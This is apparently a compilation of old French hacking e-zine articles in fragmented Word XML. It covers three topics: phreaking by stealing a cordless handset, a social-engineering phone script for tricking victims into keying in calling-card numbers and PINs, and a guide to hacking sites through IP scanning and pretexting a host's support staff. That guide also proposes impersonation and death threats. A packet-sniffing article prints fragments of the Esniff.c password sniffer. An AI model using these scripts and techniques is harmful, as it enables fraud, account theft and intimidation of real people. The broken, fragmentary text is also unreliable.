fprintf(LOG,"(%d)",*d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astc = *d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flush(LO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END_NODE(CLe,d,dl,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CREC *CL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char *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int d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n-- TCP/IP LOG -- TM: %s --\n", Ptm(&amp;CLe-&gt;Ti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 PATH: %s(%s) =&gt;", Symaddr(CLe-&gt;SRCip),SERVp(CLe-&gt;SRC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 %s(%s)\n", Symaddr(CLe-&gt;DSTip),SERVp(CLe-&gt;DST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 STAT: %s, %d pkts, %d bytes [%s]\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NOWtm(),CLe-&gt;PKcnt,(CLe-&gt;Length+dl),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 DATA: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u_int i = CLe-&gt;Leng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char *p = CLe-&gt;Data;</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_DATA(p,i);</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_DATA(d,d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n-- \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flush(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Le-&gt;Next != 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e-&gt;Next-&gt;Last = CLe-&gt;La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Le-&gt;Last != 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e-&gt;Last-&gt;Next = CLe-&gt;Nex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root = CLe-&gt;Nex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ree(CL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30 mins (x 60 second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DLE_TIMEOUT 180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DLE_NODE()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_t tm;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amp;tm);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LastTIME&lt;tm)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CREC *CLe,*CLt = CLroo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astTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOU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CLe=CLt)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CLe-&gt;Nex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Le-&gt;Time &lt;tm)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_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOU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filter(cp, pkt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c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int pkt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ip *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tcphdr *tcp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u_short EtherType=ntohs(((struct ether_header *)cp)-&gt;ether_typ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EtherType &lt; 0x600)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therType = *(u_short *)(cp + SZETH + 6);</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p+=8; pktlen-=8;</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EtherType != ETHERTYPE_IP) /* chuk it if its not I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ugh, gotta do an alignment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copy(cp + SZETH, (char *)Packet,(int)(pktlen - SZE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p = (struct ip *)Pa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ip-&gt;ip_p != IPPROTO_TCP) /* chuk non tcp pkt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cph = (struct tcphdr *)(Packet + IPH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TCPD == IPPORT_TELNE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CPD == IPPORT_LOGINSERVE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tur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struct CREC *CL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int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));</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char *p = (u_char *)Pa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 += ((IPHLEN * 4) + (TCPOFF * 4));</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debu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PKT: (%s %04X) ", TCPflags(tcph-&gt;th_flags),leng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s[%s] =&gt; ", inet_ntoa(IPS),SERVp(TCP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s[%s]\n", inet_ntoa(IPD),SERVp(TCP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CLm = GET_NODE(IPS, TCPS, IPD, TCPD)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m-&gt;PKcn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length&g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CLm-&gt;Length + length) &lt; MAXBUFLEN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ADDDATA_NODE( CLm, p,leng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els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_NODE( CLm, p,length, "DATA LIMI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CPFL(TH_FIN|TH_RS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_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RS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els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CPFL(TH_SY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ADD_NODE(IPS,IPD,TCPS,TCPD,p,leng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DLE_NOD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signal handle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dea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struct CREC *CL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CLe=CLroo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_NODE( CLe, (u_char *)NULL,0, "SIGNA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nLog ended at =&gt; %s\n",NOWt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flush(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LOG != std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close(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opens network interface, performs ioctls and reads from i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passing data to filter functio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do_i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c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short sp_ts_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buf=malloc(CHUNKSIZ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mallo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this /dev/nit initialization code pinched from etherfind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strioctl si;</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freq if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timeval time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int chunksize = CHUNKSIZ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long if_flags = NI_PROMIS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f_fd = open(NIT_DEV, O_RDONLY))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nit op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SRDOPT, (char *)RMSGD)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SRDOP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timout = INFTI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PUSH, "nbuf")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PUSH \"n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out.tv_sec =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out.tv_usec =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cmd = NIOCSTI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len = sizeof(time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dp = (char *)&amp;time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STR, (char *)&amp;si)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STR: NIOCSTI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cmd = NIOCSCHUN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len = sizeof(chunksiz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dp = (char *)&amp;chunksiz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STR, (char *)&amp;si)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STR: NIOCSCHUN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ncpy(ifr.ifr_name, device, sizeof(ifr.ifr_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r.ifr_name[sizeof(ifr.ifr_name) - 1] =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cmd = NIOCBIN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len = sizeof(if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dp = (char *)&amp;if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STR, (char *)&amp;si)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STR: NIOCBIN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cmd = NIOCS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len = sizeof(if_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dp = (char *)&amp;if_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STR, (char *)&amp;si)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STR: NIOCS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FLUSH, (char *)FLUSHR)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FLUS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 ((cc = read(if_fd, buf, CHUNKSIZE)) &gt;= 0)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bp = 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ufstop = (buf + c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 (bp &lt; bufsto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cp = b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nit_bufhdr *hdr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hdrp = (struct nit_bufhdr *)c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p += sizeof(struct nit_bufhd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p += hdrp-&gt;nhb_tot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ilter(cp, (u_long)hdrp-&gt;nhb_msg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rea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Authorize your proogie,generate your own password and uncomment her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define AUTHPASSWD "EloiZgZejWym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getau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char *buf,*getpass(),*cryp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pwd[21],prmpt[8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cpy(pwd,AUTHPASSW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printf(prmpt,"(%s)UP? ",Prog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uf=getpass(prmp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strcmp(pwd,crypt(buf,pw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main(argc, argv)</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arg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argv;</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cbuf[BUFSIZ];</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fconf if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ac=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ackg=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ogName=argv[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getauth();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OG=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vice=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ac&lt;argc) &amp;&amp; (argv[ac][0] ==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ch = argv[ac++][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witch(toupper(ch))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I': device=argv[a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F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))</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Zexit(1,"Output file cant be opened\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B': backg=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D': debug=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ault : fprintf(ER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sage: %s [-b] [-d] [-i interface] [-f fi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og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devic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s=socket(AF_INET, SOCK_DGRAM, 0))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so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ifc_len = sizeof(c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ifc_buf = c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s, SIOCGIFCONF, (char *)&amp;ifc)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ose(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vice = ifc.ifc_req-&gt;ifr_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ERR,"Using logical device %s [%s]\n",device,NIT_DEV);</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ERR,"Output to %s.%s%s",(LOG)?LogName:"std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bug)?" (debug)":"",(backg)?" Backgrounding ":"\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OG=std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gnal(SIGINT, dea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gnal(SIGTERM,dea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gnal(SIGKILL,dea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gnal(SIGQUIT,dea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backg &amp;&amp; debu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ERR,"[Cannot bg with debug on]\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ackg=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back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int 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s=fork())&gt;0)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ERR,"[pid %d]\n",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else if(s&l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for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s=open("/dev/tty",O_RDWR))&gt;0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octl(s,TIOCNOTTY,(char *)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ose(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nLog started at =&gt; %s [pid %d]\n",NOWtm(),getpi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flush(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o_i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Gobbler:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> c'est un bon sniffer qui est singulier par sa présentation. Trouvable sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;ftp://ftp.tortada.se/www/hokum/gobbler.zip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">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ETHLOAD:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> un excellent sniffer ethernet qui permettait de surveiller les session "rlogin" et "telnet", ce sniffer n'étant plus distribué par les développeurs eux-mêmes, on peut le trouver sur: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;http://www.computercraft.com/noprogs/ethld104.zip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">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LinSniff:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour tous les hackers qui veulent que les mots de passe. Celui-ci ne sniffe QUE les mots de passe. En voici le code source, à compiler en C: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inSniffer 0.02 [BETA]</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Mike Edulla</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medulla@infosoc.co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O NOT REDISTRIBUT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types.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socket.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time.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n.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db.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tring.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linux/if.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ignal.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tdio.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arpa/inet.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linux/socket.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linux/i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linux/tc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linux/if_ether.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openintf(cha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read_tcp(in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filter(voi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print_header(voi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print_data(int, cha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hostlookup(unsigned long in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clear_victim(voi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etherpa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ethhdr e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phdr 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tcphdr tc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buff[819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nsigned long sadd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nsigned long dadd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nsigned short s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nsigned short d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bytes_rea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activ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_t start_ti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victi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phdr *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tcphdr *tc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CAPTLEN 51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TIMEOUT 3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openintf(char *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f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freq if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d=socket(AF_INET, SOCK_PACKET, htons(0x80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fd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rror("cant get SOCK_PACKET so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cpy(ifr.ifr_name, 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octl(fd, SIOCGIFFLAGS, &amp;if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s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ose(f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rror("cant get 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r.ifr_flags |= IFF_PROMIS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octl(fd, SIOCSIFFLAGS, &amp;if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s &lt; 0) perror("cant set promiscuous mod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f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read_tcp(int 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x;</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x=read(s, (struct etherpacket *)&amp;ep, sizeof(e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x &gt;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filter()==0) continu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x=x-54;</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x &lt; 1) continu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x;</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filter(voi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p-&gt;protocol != 6) return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victim.active !=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victim.bytes_read &gt; CAPT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n----- [CAPLEN Exceeded]\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ear_victi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victim.active !=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ime(NULL) &gt; (victim.start_time + TIME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n----- [Timed Out]\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ear_victi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ntohs(tcp-&gt;dest)==21) p=1; /* ft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ntohs(tcp-&gt;dest)==23) p=1; /* telne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ntohs(tcp-&gt;dest)==110) p=1; /* pop3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ntohs(tcp-&gt;dest)==109) p=1; /* pop2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ntohs(tcp-&gt;dest)==143) p=1; /* imap2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ntohs(tcp-&gt;dest)==513) p=1; /* rlogi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ntohs(tcp-&gt;dest)==106) p=1; /* poppasswd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victim.active ==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p ==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cp-&gt;syn ==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saddr=ip-&gt;sadd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daddr=ip-&gt;dadd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active=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sport=tcp-&gt;sourc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dport=tcp-&gt;de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bytes_read=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start_time=time(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_heade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cp-&gt;dest != victim.dport) return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cp-&gt;source != victim.sport) return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p-&gt;saddr != victim.saddr) return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p-&gt;daddr != victim.daddr) return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cp-&gt;rst ==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active=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alarm(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n----- [RST]\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ear_victi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cp-&gt;fin ==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active=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alarm(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n----- [FIN]\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ear_victi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print_header(voi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ut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s =&gt; ", hostlookup(ip-&gt;sadd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s [%d]\n", hostlookup(ip-&gt;daddr), ntohs(tcp-&gt;de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print_data(int datalen, char *data)</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i=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bytes_read=victim.bytes_read+data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or(i=0;i != datalen;i++)</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data[i] == 13) {puts(" ");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sprint(data[i])) {printf("%c", data[i]);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 &gt; 75) {t=0;put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mai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openintf("eth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p=(struct iphdr *)(((unsigned long)&amp;ep.ip)-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cp=(struct tcphdr *)(((unsigned long)&amp;ep.tcp)-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gnal(SIGHUP, SIG_IG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ear_victi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o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ad_tcp(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victim.active != 0) print_data(htons(ip-&gt;tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-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hostlookup(unsigned long int i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atic char blah[1024];</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n_addr i;</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hostent *h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s_addr=i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he=gethostbyaddr((char *)&amp;i, sizeof(struct in_addr),AF_IN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he == NULL) strcpy(blah, inet_ntoa(i));</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 strcpy(blah, he-&gt;h_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bla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clear_victim(voi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saddr=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daddr=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spor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dpor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active=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bytes_read=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ictim.start_time=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Toujours dans les sniffers vous avez SunSniff, à faire tourner sous SunOS, en voici le code sourc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tdio.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ctype.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tring.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time.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file.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stropts.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signal.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types.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socket.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ioctl.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f.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nit_if.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nit_buf.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f_ar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n.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f_ether.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n_systm.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ud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p_var.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udp_var.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n_systm.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tc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p_icm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db.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arpa/inet.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ERR stder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mallo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devic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og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og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ILE *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debug=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NIT_DEV "/dev/le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CHUNKSIZE 4096 /* device buffer siz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if_fd =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Packet[CHUNKSIZE+3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Pexit(err,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err; char *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perror(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er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Zexit(err,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err; char *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fprintf(ERR,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er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 ((struct ip *)Pa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_OFFSET (0x1FF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SZETH (sizeof(struct ether_heade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LEN (ntohs(ip-&gt;ip_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HLEN (ip-&gt;ip_h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TCPOFF (tcph-&gt;th_of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S (ip-&gt;ip_sr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D (ip-&gt;ip_d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TCPS (tcph-&gt;th_s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TCPD (tcph-&gt;th_d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Peq(s,t) ((s).s_addr == (t).s_add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TCPFL(FLAGS) (tcph-&gt;th_flags &amp; (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MAXBUFLEN (128)</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_t LastTIME =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CREC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CREC *Nex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a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_t Time; /* start tim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n_addr SRC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ST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int SRCport, /* src/dst port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ST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char Data[MAXBUFLEN+2]; /* important stuff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int Length; /* current data length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int PKcnt; /* # pkt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long LASTseq;</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CREC *CLroot = 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Symaddr(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in_addr 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struct hostent *h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gethostbyaddr((char *)&amp;ip.s_addr, sizeof(struct in_addr),AF_IN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he)?(he-&gt;h_name):(inet_ntoa(i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TCPflags(fl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char fl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static char iobuf[8];</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SFL(P,THF,C) iobuf[P]=((flgs &amp; THF)?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0,TH_FIN, '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1,TH_SYN, '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2,TH_RST, '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3,TH_PUSH,'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4,TH_ACK, 'A');</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FL(5,TH_URG, 'U');</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obuf[6]=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io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SERVp(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int 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static char buf[1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witch(por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IPPORT_LOGINSERVER: p="rlogin"; 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IPPORT_TELNET: p="telnet"; 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IPPORT_SMTP: p="smtp"; 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IPPORT_FTP: p="ftp"; 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ault: sprintf(buf,"%u",port); p=buf; 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Ptm(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time_t *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char *p = ctim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strlen(p)-6]=0; /* strip " YYYY\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NOWt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time_t t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amp;t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Ptm(&amp;tm)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MAX(a,b) (((a)&gt;(b))?(a):(b))</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MIN(a,b) (((a)&lt;(b))?(a):(b))</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add an item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ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN)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CREC *CLtmp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CREC *)malloc(sizeof(struct CREC));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 &amp;(CLtmp-&gt;Time)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SRCip.s_addr = SIP.s_add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DSTip.s_addr = DIP.s_add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SRCport = SPOR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DSTport = DPOR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Length = MIN(LEN,MAXBUFLE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copy( (u_char *)DATA, (u_char *)CLtmp-&gt;Data, CLtmp-&gt;Length);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PKcnt = 1;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Next = CLroo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mp-&gt;Last = NULL;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root = CLtm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CREC *GET_NODE(Sip,SP,Dip,D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in_addr Sip,D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int SP,D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struct CREC *CLr = CLroo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CLr != NULL)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CLr-&gt;SRCport == SP) &amp;&amp; (CLr-&gt;DSTport == DP) &amp;&am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Peq(CLr-&gt;SRCip,Sip) &amp;&amp; IPeq(CLr-&gt;DSTip,Di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r = CLr-&gt;Nex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CL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ADDDATA_NODE(CL,DATA,LEN)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copy((u_char *)DATA, (u_char *)&amp;CL-&gt;Data[CL-&gt;Length],LE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gt;Length += LE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PR_DATA(dp,ln)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char lastc=0;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ln-- &gt;0)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dp &lt; 32)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witch(*dp)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0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0')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n': fprintf(LOG,"\n :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ault : fprintf(LOG,"^%c", (*dp + 64));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else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sprint(*dp)) fputc(*dp,LO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 fprintf(LOG,"(%d)",*d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astc = *d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flush(LO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END_NODE(CLe,d,dl,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CREC *CL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char *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int d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n-- TCP/IP LOG -- TM: %s --\n", Ptm(&amp;CLe-&gt;Ti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 PATH: %s(%s) =&gt;", Symaddr(CLe-&gt;SRCip),SERVp(CLe-&gt;SRC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 %s(%s)\n", Symaddr(CLe-&gt;DSTip),SERVp(CLe-&gt;DSTpor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 STAT: %s, %d pkts, %d bytes [%s]\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NOWtm(),CLe-&gt;PKcnt,(CLe-&gt;Length+dl),ms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 DATA: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u_int i = CLe-&gt;Leng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char *p = CLe-&gt;Data;</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_DATA(p,i);</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_DATA(d,d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n-- \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flush(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Le-&gt;Next != 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e-&gt;Next-&gt;Last = CLe-&gt;La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Le-&gt;Last != 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e-&gt;Last-&gt;Next = CLe-&gt;Nex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root = CLe-&gt;Nex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ree(CL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30 mins (x 60 second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DLE_TIMEOUT 180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IDLE_NODE()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_t tm;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amp;tm);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LastTIME&lt;tm)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CREC *CLe,*CLt = CLroo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astTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOU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CLe=CLt)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t=CLe-&gt;Nex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Le-&gt;Time &lt;tm)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_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOU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filter(cp, pkt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c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int pkt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ip *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tcphdr *tcp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u_short EtherType=ntohs(((struct ether_header *)cp)-&gt;ether_typ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EtherType &lt; 0x600)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therType = *(u_short *)(cp + SZETH + 6);</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p+=8; pktlen-=8;</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EtherType != ETHERTYPE_IP) /* chuk it if its not I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ugh, gotta do an alignment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copy(cp + SZETH, (char *)Packet,(int)(pktlen - SZE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p = (struct ip *)Pa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ip-&gt;ip_p != IPPROTO_TCP) /* chuk non tcp pkt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cph = (struct tcphdr *)(Packet + IPH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TCPD == IPPORT_TELNE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CPD == IPPORT_LOGINSERVER)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CPD == IPPORT_FT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tur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struct CREC *CL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int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));</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u_char *p = (u_char *)Pa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 += ((IPHLEN * 4) + (TCPOFF * 4));</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debu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PKT: (%s %04X) ", TCPflags(tcph-&gt;th_flags),leng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s[%s] =&gt; ", inet_ntoa(IPS),SERVp(TCP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s[%s]\n", inet_ntoa(IPD),SERVp(TCP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CLm = GET_NODE(IPS, TCPS, IPD, TCPD)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m-&gt;PKcn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length&g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CLm-&gt;Length + length) &lt; MAXBUFLEN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ADDDATA_NODE( CLm, p,leng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els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_NODE( CLm, p,length, "DATA LIMI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CPFL(TH_FIN|TH_RS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_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RS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els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TCPFL(TH_SYN))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ADD_NODE(IPS,IPD,TCPS,TCPD,p,leng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DLE_NOD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signal handle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dea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register struct CREC *CL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CLe=CLroo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_NODE( CLe, (u_char *)NULL,0, "SIGNA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nLog ended at =&gt; %s\n",NOWt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flush(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LOG != std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close(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opens network interface, performs ioctls and reads from i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passing data to filter functio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do_i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c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short sp_ts_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buf=malloc(CHUNKSIZ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mallo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this /dev/nit initialization code pinched from etherfind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strioctl si;</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freq if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timeval time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int chunksize = CHUNKSIZ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_long if_flags = NI_PROMIS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f_fd = open(NIT_DEV, O_RDONLY))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nit op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SRDOPT, (char *)RMSGD)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SRDOP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timout = INFTIM;</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PUSH, "nbuf")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PUSH \"n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out.tv_sec =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out.tv_usec =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cmd = NIOCSTI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len = sizeof(time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dp = (char *)&amp;time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STR, (char *)&amp;si)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STR: NIOCSTI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cmd = NIOCSCHUN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len = sizeof(chunksiz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dp = (char *)&amp;chunksiz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STR, (char *)&amp;si)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STR: NIOCSCHUN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ncpy(ifr.ifr_name, device, sizeof(ifr.ifr_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r.ifr_name[sizeof(ifr.ifr_name) - 1] =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cmd = NIOCBIN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len = sizeof(if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dp = (char *)&amp;if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STR, (char *)&amp;si)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STR: NIOCBIN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cmd = NIOCS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len = sizeof(if_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ic_dp = (char *)&amp;if_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STR, (char *)&amp;si)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STR: NIOCS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if_fd, I_FLUSH, (char *)FLUSHR)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 (I_FLUS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 ((cc = read(if_fd, buf, CHUNKSIZE)) &gt;= 0)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bp = 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ufstop = (buf + c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 (bp &lt; bufstop)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cp = b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struct nit_bufhdr *hdr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hdrp = (struct nit_bufhdr *)c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p += sizeof(struct nit_bufhd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p += hdrp-&gt;nhb_tot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ilter(cp, (u_long)hdrp-&gt;nhb_msg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rea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Yo Authorize your proogie,generate your own password and uncomment her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define AUTHPASSWD "EloiZgZejWym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getau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char *buf,*getpass(),*cryp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pwd[21],prmpt[8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cpy(pwd,AUTHPASSW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printf(prmpt,"(%s)UP? ",Prog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uf=getpass(prmp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strcmp(pwd,crypt(buf,pw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void main(argc, argv)</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arg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argv;</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cbuf[BUFSIZ];</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fconf if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ac=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ackg=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ogName=argv[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getauth();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OG=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vice=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ac&lt;argc) &amp;&amp; (argv[ac][0] ==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char ch = argv[ac++][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witch(toupper(ch))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I': device=argv[a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F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))</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Zexit(1,"Output file cant be opened\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B': backg=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ase 'D': debug=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rea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ault : fprintf(ER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Usage: %s [-b] [-d] [-i interface] [-f fi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og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devic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s=socket(AF_INET, SOCK_DGRAM, 0))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so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ifc_len = sizeof(c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ifc_buf = cbu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octl(s, SIOCGIFCONF, (char *)&amp;ifc) &lt;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Eth: ioct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ose(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vice = ifc.ifc_req-&gt;ifr_nam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ERR,"Using logical device %s [%s]\n",device,NIT_DEV);</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ERR,"Output to %s.%s%s",(LOG)?LogName:"std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bug)?" (debug)":"",(backg)?" Backgrounding ":"\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LOG=std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gnal(SIGINT, dea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gnal(SIGTERM,dea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gnal(SIGKILL,dea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ignal(SIGQUIT,dea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backg &amp;&amp; debu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ERR,"[Cannot bg with debug on]\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ackg=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back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gister int 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s=fork())&gt;0)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ERR,"[pid %d]\n",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else if(s&lt;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xit(1,"fork");</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s=open("/dev/tty",O_RDWR))&gt;0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octl(s,TIOCNOTTY,(char *)NULL);</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ose(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printf(LOG,"\nLog started at =&gt; %s [pid %d]\n",NOWtm(),getpi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flush(LO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o_i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color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>A faire tourner sous Linux, et toujours des sniffers, linux_sniffer. A compiler en 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ipl.c 1/3/95 by loq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monitors ip packets for Linux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types.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socket.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ys/time.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netinet/in.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linux/if.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ignal.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stdio.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linux/socket.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linux/i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linux/tcp.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clude &lt;linux/if_ether.h&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BUFLEN 819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ETHLINKHDR 14</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_data(int count, char *buf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i,j,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printnext=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oun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count%16)</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count+(16-count%16);</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 c=coun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coun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or(i=0;i&lt;c;i++)</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printnext) { printnext--; printf("%.4x ",i&amp;0xffff);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lt;coun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3.2x",buff[i]&amp;0xf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1)%8))</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i+1)%16)</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or(j=i-15;j&lt;=i;j++)</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j&lt;coun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buff[j]&amp;0xff) &gt;= 0x20 &amp;&am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uff[j]&amp;0xff)&lt;=0x7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c",buff[j]&amp;0xf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 print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else printf("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n"); printnext=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itdevice(device, pfla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devic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pflag;</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efine PROTO htons(0x0800) /* Ethernet code for IP protocol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if_fd=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freq if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 (if_fd=socket(AF_INET,SOCK_PACKET,PROTO)) &lt; 0 )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rror("Can't get socke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cpy(ifr.ifr_name, device); /* interface we're gonna us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ioctl(if_fd, SIOCGIFFLAGS, &amp;ifr) &lt; 0 ) { /* get flag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ose(if_f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rror("Can't get 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 pflag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r.ifr_flags |= IFF_PROMISC; /* set promiscuous mode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r.ifr_flags &amp;= ~(IFF_PROMISC);</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i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ioctl(if_fd, SIOCSIFFLAGS, &amp;ifr) &lt; 0 ) { /* set flags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lose(if_f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error("Can't set flags");</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xit(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turn if_f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etherpacket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ethhdr eth;</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phdr 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tcphdr tc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char data[819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mai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linktyp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if_eth_fd=initdevice("eth0",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if_ppp_fd=initdevice("sl0",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i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etherpacket e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sockaddr de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iphdr *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tcphdr *tc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timeval time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d_set rd,w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nt d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truct slcompress *slc=slhc_init(64,64);</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i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o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bzero(&amp;dest,sizeof(de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dlen=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D_ZERO(&amp;r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D_ZERO(&amp;wr);</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D_SET(if_eth_fd,&amp;r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FD_SET(if_ppp_fd,&amp;r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i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out.tv_sec=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out.tv_usec=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p=(struct iphdr *)(((unsigned long)&amp;ep.ip)-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cp=(struct tcphdr *)(((unsigned long)&amp;ep.tcp)-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hile(timeout.tv_sec==0 &amp;&amp; timeout.tv_usec==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out.tv_sec=1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timeout.tv_usec=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elect(20,&amp;rd,&amp;wr,NULL,&amp;timeou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FD_ISSET(if_eth_fd,&amp;r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eth\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cvfrom(if_eth_fd,&amp;ep,sizeof(ep),0,&amp;dest,&amp;d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ls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FD_ISSET(if_ppp_fd,&amp;rd))</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recvfrom(if_ppp_fd,&amp;ep,sizeof(ep),0,&amp;dest,&amp;dle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ppp\n");</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i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proto: %.4x",ntohs(ep.eth.h_proto));</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 0</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ep.eth.h_proto==ntohs(8053))</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slhc_uncompress(slc,&amp;ep,sizeof(e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ndif</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if(ep.eth.h_proto==ntohs(ETH_P_I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2x:%.2x:%.2x:%.2x:%.2x:%.2x-&g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p.eth.h_source[0],ep.eth.h_source[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p.eth.h_source[2],ep.eth.h_source[3],</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p.eth.h_source[4],ep.eth.h_source[5]);</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2x:%.2x:%.2x:%.2x:%.2x:%.2x ",</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p.eth.h_dest[0],ep.eth.h_dest[1],</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p.eth.h_dest[2],ep.eth.h_dest[3],</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p.eth.h_dest[4],ep.eth.h_dest[5]);</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s[%d]-&gt;",inet_ntoa(ip-&gt;saddr),ntohs(tcp-&gt;source));</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f("%s[%d]\n",inet_ntoa(ip-&gt;daddr),ntohs(tcp-&gt;des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print_data(htons(ip-&gt;tot_len)-sizeof(ep.ip)-sizeof(ep.tcp),</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ep.data-2);</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w:t>
      </w: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Cas du switc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switch est intelligent; il se comporte de la manière suivante: Quand une machine A veut envoyer quelquechose à la machine C le switch fait passer la trame directement à la machine C sans passer par la machine B à l'instar du hub. C'est là qu'intervient Hunt. Ce programme permet de faire croire au switch que vous êtes la machine C. Bien entendu celà demande à connaitre l'adresse de la machine C. A partir de là, vous récupérez le packe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Et ça va même encore plus loin...:</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e plus Hunt, après avoir récupéré le packet, peut l'envoyer à la machine C: ni vu ni connu, voilà qu'un réseau est mis sous surveillanc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Mai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ublions pas que si Hunt permet de récupérer les packets destinés à UNE machine, Hunt ne permet aps l'écoute de tout le réseau à cause du switc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Infos:</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Actuellement Hunt v1.4 est disponible. Celui-ci fonctionne sur: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Linux 2.2, GlibC 2.1 with LinuxThreads, Etherne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les plus curieux d'entre vous, voici le code source de Hu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tab/>
        <w:t>This is free software. You can redistribute it and/or modify und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tab/>
        <w:t>the terms of the GNU General Public License version 2.</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tab/>
        <w:t>Copyright (C) 1998 by kra</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clude "hunt.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clude &lt;sys/types.h&g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clude &lt;sys/time.h&g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clude &lt;stdio.h&g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clude &lt;stdlib.h&g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clude &lt;string.h&g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clude &lt;signal.h&g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clude &lt;unistd.h&g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clude &lt;assert.h&g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fndef IP_OFFMAS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define IP_OFFMASK 0x1ff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end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fndef IP_M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define IP_MF</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   0x200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end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t linksock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t mac_learn_from_ip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t conn_list_mac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t conn_list_seq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hash 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hash mac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t hunt_ready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pthread_mutex_t mutex_hunt_ready = PTHREAD_MUTEX_INITIALIZ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pthread_cond_t cond_hunt_ready = PTHREAD_COND_INITIALIZ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list of struct packet_info with information which packets skip in proces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of updating connecti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list l_skip_update = LIST_INIT(struct packet_info, nex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lists of functions which pass packets to modul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list l_ifunc_ip = LIST_INIT(struct ifunc_item, next_i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list l_ifunc_tcp = LIST_INIT(struct ifunc_item, next_tc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list l_ifunc_udp = LIST_INIT(struct ifunc_item, next_ud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list l_ifunc_icmp = LIST_INIT(struct ifunc_item, next_ic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list l_ifunc_arp = LIST_INIT(struct ifunc_item, next_ar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list l_ifunc_fast_tcp = LIST_INIT(struct ifunc_item, next_tc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packet operation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struct list l_packets = LIST_INIT(struct packet, p_next_fre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t packets_allocated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packet *packet_new(voi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p = list_pop(&amp;l_packet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p = malloc(sizeof(struct packe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perror("mallo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return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thread_mutex_init(&amp;p-&gt;p_mutex,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gt;p_use_count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gt;p_hdr.p_tcph =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gt;p_data =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gt;p_type = PACKET_NON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gt;p_ipc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gt;p_ipc_arg =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ackets_allocat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gt;p_use_count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return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packet_copy_data(struct packet *dst, struct packet *sr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memcpy(dst-&gt;p_raw, src-&gt;p_raw, src-&gt;p_raw_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dst-&gt;p_raw_len = src-&gt;p_raw_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dst-&gt;p_type = src-&gt;p_typ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dst-&gt;p_ethh = (struct ethhdr *)(dst-&gt;p_raw +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char *)src-&gt;p_ethh - src-&gt;p_ra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dst-&gt;p_iph = (struct iphdr *)(dst-&gt;p_raw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char *)src-&gt;p_iph - src-&gt;p_ra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dst-&gt;p_arph = (struct arphdr *)(dst-&gt;p_raw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char *)src-&gt;p_arph - src-&gt;p_ra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dst-&gt;p_hdr.p_tcph = (struct tcphdr *)(dst-&gt;p_raw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char *)src-&gt;p_hdr.p_tcph - src-&gt;p_ra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dst-&gt;p_data_len = src-&gt;p_data_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dst-&gt;p_data = dst-&gt;p_raw + (src-&gt;p_data - src-&gt;p_ra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memcpy(dst-&gt;p_arg, src-&gt;p_arg, sizeof(src-&gt;p_ar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dst-&gt;p_ipc = src-&gt;p_ip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dst-&gt;p_ipc_arg = src-&gt;p_ipc_ar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packet_free(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nt is_fre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mutex_lock(&amp;p-&gt;p_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p-&gt;p_use_count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s_free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s_free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mutex_unlock(&amp;p-&gt;p_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is_fre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list_push(&amp;l_packets,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packet_want(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mutex_lock(&amp;p-&gt;p_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gt;p_use_cou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mutex_unlock(&amp;p-&gt;p_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packet_flush(struct list *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p = list_pop(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acket_free(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packet_preallocate(int cou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packet **p = alloca(count * sizeof(struct packe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nt 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for (i = 0; i &lt; count; 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i] = packet_ne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for (i = 0; i &lt; count; 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acket_free(p[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t packet_count(voi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return list_count(&amp;l_packet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TCP connection databa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inline void fill_uci(struct user_conn_info *uci, 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ci-&gt;src_addr = p-&gt;p_iph-&gt;s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ci-&gt;dst_addr = p-&gt;p_iph-&gt;d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ci-&gt;src_port = p-&gt;p_hdr.p_tcph-&gt;sourc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ci-&gt;dst_port = 